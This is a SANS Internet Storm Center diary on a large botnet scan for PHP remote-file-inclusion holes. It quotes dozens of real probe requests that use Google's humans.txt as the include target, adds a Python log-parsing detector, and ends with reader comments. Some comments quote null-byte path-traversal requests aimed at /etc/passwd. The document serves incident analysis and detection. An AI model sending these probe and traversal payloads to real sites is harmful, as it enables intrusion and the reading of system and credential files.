SANS ISC: Massive PHP RFI scans - SANS Internet Storm Center


Massive PHP RFI scans
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scan. Yinette has been seeing this for quite some time, and the number of requests sent by this (as yet unknown) bot or botnet kept rising.
Judging by the source IP addresses, the bots appear to be running on compromised web servers with typical cPanel installations and large numbers of hosted virtual servers.
 
The scanning requests are relatively fast: in the capture Yinette made, the bot constantly sent at least 2 requests per second. All requests try to exploit an RFI vulnerability (I haven't checked yet whether all of them are well known, but a cursory inspection says most of them are), and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).
 
The bot almost certainly parses the output, and if it sees the contents of the humans.txt file it knows that the site has an RFI (Remote File Inclusion) vulnerability. Google's availability and uptime help, of course.
 
Some observed requests are shown below:
 
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
 
This is only a small part of all the requests the bot sends. In total, on Yinette's web site it sent 804 requests (that's 804 vulnerabilities it's trying to exploit)! This indeed might be someone trying to build a bigger botnet.
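As an added example (not from the diary or from Yinette's capture), the following Python script shows how a defender can pull these probes out of an ordinary access log: it parses each request line, decodes every query parameter (including bracketed array keys such as gConf[dir][layouts] and double-encoded values), and flags values that point at a remote URL, which is the remote-include probe quoted above. Going beyond the diary's sample, it also flags values that walk up the directory tree or carry a NUL byte, the local-include variant of the same kind of scan. The log lines, source IP addresses and timestamps below are constructed for the example; the humans.txt URL is the one the diary reports.

```python
"""Flag PHP remote/local file-inclusion probes in a combined-format access log.

Added example, not part of the ISC diary. All log lines below are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line as it appears in an Apache/nginx combined-format log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# A parameter value pointing at a remote resource: the remote-include probe.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# A parameter value that walks up the tree or carries a NUL byte: the local-include probe.
TRAVERSAL_RE = re.compile(r'(?:\.\./|\.\.\\){2,}|\x00')

# Constructed sample log; the request targets mirror the shapes seen in such scans.
SAMPLE_LOG = [
    '198.51.100.23 - - [10/Oct/2000:13:55:36 +0000] "GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0" 404 289 "-" "-"',
    '198.51.100.23 - - [10/Oct/2000:13:55:36 +0000] "GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0" 404 289 "-" "-"',
    '198.51.100.23 - - [10/Oct/2000:13:55:37 +0000] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0" 200 1534 "-" "-"',
    '203.0.113.9 - - [10/Oct/2000:13:58:40 +0000] "GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0" 404 289 "-" "-"',
    '203.0.113.9 - - [10/Oct/2000:13:58:41 +0000] "GET /index.php?p=%252e%252e/%252e%252e/etc/passwd%2500 HTTP/1.0" 404 289 "-" "-"',
    '192.0.2.50 - - [10/Oct/2000:14:01:00 +0000] "GET /index.php?page=about&ref=https://example.org/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def deep_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen as well."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_target(target):
    """Return a list of (kind, param, decoded_value) findings for one request target."""
    findings = []
    query = urlsplit(target).query          # everything after the first '?'
    for key, raw in parse_qsl(query, keep_blank_values=True):
        value = deep_unquote(raw)            # parse_qsl decoded once already
        if REMOTE_RE.match(value):
            findings.append(("rfi", key, value))
        elif TRAVERSAL_RE.search(value):
            findings.append(("lfi", key, value))
    return findings


def scan_log(lines):
    """Walk access-log lines and return one record per suspicious parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue                         # not a request line we understand
        target = m.group("target")
        for kind, param, value in classify_target(target):
            hits.append({
                "ip": m.group("ip"),
                "path": urlsplit(target).path,
                "kind": kind,
                "param": param,
                "value": value,
            })
    return hits


def suspicious_sources(hits, threshold=2):
    """Map source IP -> hit count for sources at or above the threshold.

    Volume per source is the real signal: one URL-valued parameter can be
    legitimate, hundreds of distinct PHP paths from one address cannot.
    """
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]:15} {h["kind"]} {h["path"]} {h["param"]}={h["value"]!r}')
    print("sources over threshold:", suspicious_sources(found))
```

The last sample line is a legitimate request whose `ref` parameter happens to hold a URL, and it is flagged too; that is why `suspicious_sources` aggregates per source address instead of alerting on single requests. A scanner of the kind the diary describes gives itself away by volume (hundreds of distinct PHP paths from one address within seconds), so the threshold, not the per-request signature, is what keeps the alert useful.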

Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!

--
Bojan
@bojanz
INFIGO IS

I saw a burst of a few hundred attempts to grab the /etc/passwd file....
"GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0"
"GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0"
"GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0"
"GET /irsr/authenticate/sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0"
etc., etc.
John

I saw a massive scan for PHP exploits on our webservers on 22 December (US IP), 28 December (AUS IP) and 4 January (GER and S IP); it looks like it happens every week on a regular basis. Most of them are pretty old.
Nik

We have been seeing the humans.txt RFI requests since 17 Dec, and they continue; we have some 45,000 in WAF logs from 57 different source IPs attacking various addresses in our class C address space, many not even hosting PHP sites. Valid host headers are used (i.e. they are not based just on target IP).
JLD

Yes, we have had a *massive* uptick of PHP TCP/80 vulnerability scans against our perimeters that began last November. The scans have been trending down since November but are still generating a good number (the majority) of events in our IPS even today. The source addresses are distributed, so it's either due to a botnet or to a high number of infected systems.
da1212

We're seeing a weekly attack against our external web site of about 450 or so various PHP exploits (e.g., ppalCart PHP File Include Vulnerability). They're all being blocked by our HP TippingPoint IPS/IDS. They started about mid December and have been weekly since then. We don't use PHP.
Anonymous

I cannot tell you what bot, but what they are looking for (partly anyway) is a hole in vBulletin, which is extremely vulnerable. Many sites have just pulled the plug until a fix is given. I just love PHP and sloppy code! We never had these problems with C and Perl, as you really had to learn them to use them. PHP could be better if they spent time learning before writing crap. Best, Al
Al of Your Data Center
